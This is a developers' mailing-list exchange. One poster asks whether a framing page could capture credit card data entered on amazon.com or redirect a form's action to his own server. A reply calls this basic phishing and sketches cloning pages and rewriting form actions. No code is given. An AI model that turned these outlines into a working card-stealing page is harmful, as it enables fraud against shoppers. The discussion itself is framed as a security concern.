So I can have a frame load up amazon.com and check if they're on the page where they put in the credit card information and do the following: a. read the information from the fields directly (would have check it every few seconds and submit to the home server through ajax or something) b. change the action in the form to have the form submit to my site, and then use my site to redirect back to amazon's action page (basically stealing the cc info, with the user not even knowing).
I know I might get some warnings about security with b, since their site is on a secure server, and my action url is not. But the whole point is, is it possible? This really worries me that anybody can just do attacks like this to any site that doesn't have the 'bust out of frames' code in there. I know it's not technically XSS, but I'm not sure what else to call it. I just haven't though of this issue before and never heard it mentioned, so I wasn't sure if it's possible. But if you are saying it is possible, then we're opening a whole can of worms here. Russ This can has been open for some time now, you have just described the basic fishing scheme. Create a clone site on a sever I control. Trick or entice users to my site instead of the original site. Do nasty things with any data I can fool these people in providing me. This has been going on for years. I do not even need to use frames. I could pull your page in server side and parse it back out. I could just link to your page, but change some of the code (such as form actions) with regex. Many ways to skin this cat. -------------- Ian Skinner Web Programmer BloodSource www.BloodSource.org Sacramento, CA âââ¬ââ â1â â âââ¼â⤠â â â âââ´ââ "C code. C code run. Run code run. Please!" - Cynthia Dunning ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Message: http://www.houseoffusion.com/lists.cfm/link=i:4:229937 Archives: http://www.houseoffusion.com/cf_lists/threads.cfm/4 Subscription: http://www.houseoffusion.com/lists.cfm/link=s:4 Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4 Donations & Support: http://www.houseoffusion.com/tiny.cfm/54
